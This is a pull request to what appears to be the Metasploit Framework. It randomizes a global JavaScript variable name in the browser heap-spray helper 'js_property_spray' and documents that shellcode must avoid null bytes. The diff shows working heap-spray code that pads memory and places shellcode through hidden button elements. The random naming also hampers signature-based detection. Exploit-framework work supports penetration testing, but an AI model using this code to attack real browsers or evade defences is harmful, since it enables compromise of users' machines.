### PR TITLE
Randomize js global variable name

### DIFF
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -798,7 +798,7 @@ protected
 	# publication on "DEPS – Precise Heap Spray on Firefox and IE10".
 	#
 	# The "sprayHeap" JavaScript function supports the following arguments:
-	#   shellcode     => The shellcode to spray in JavaScript.
+	#   shellcode     => The shellcode to spray in JavaScript.  Note: Avoid null bytes.
 	#   objId         => Optional. The ID for a <div> HTML tag.
 	#   offset        => Optional. Number of bytes to align the shellcode, default: 0x104
 	#   heapBlockSize => Optional. Allocation size, default: 0x80000

--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -813,8 +813,9 @@ protected
 	#   </script>
 	#
 	def js_property_spray
+		sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)
 		js = %Q|
-		var div_container;
+		var #{sym_div_container};
 		function sprayHeap( oArg ) {
 
 			shellcode     = oArg.shellcode;
@@ -830,13 +831,13 @@ protected
 
 			if (offset > 0x800) { throw "Bad alignment"; }
 
-			div_container = document.getElementById(objId);
+			#{sym_div_container} = document.getElementById(objId);
 
-			if (div_container == null) {
-				div_container = document.createElement("div");
+			if (#{sym_div_container} == null) {
+				#{sym_div_container} = document.createElement("div");
 			}
 
-			div_container.style.cssText = "display:none";
+			#{sym_div_container}.style.cssText = "display:none";
 			var data;
 			junk = unescape("%u2020%u2020");
 			while (junk.length < offset+0x1000) junk += junk;
@@ -850,7 +851,7 @@ protected
 			{
 				var obj = document.createElement("button");
 				obj.title = data.substring(0, (heapBlockSize-2)/2);
-				div_container.appendChild(obj);
+				#{sym_div_container}.appendChild(obj);
 			}
 		}
 		|


### PR DESCRIPTION
"div_container" is global.  Randomized it so it doesn't have to be (global).

Also documented about the null byte restriction.
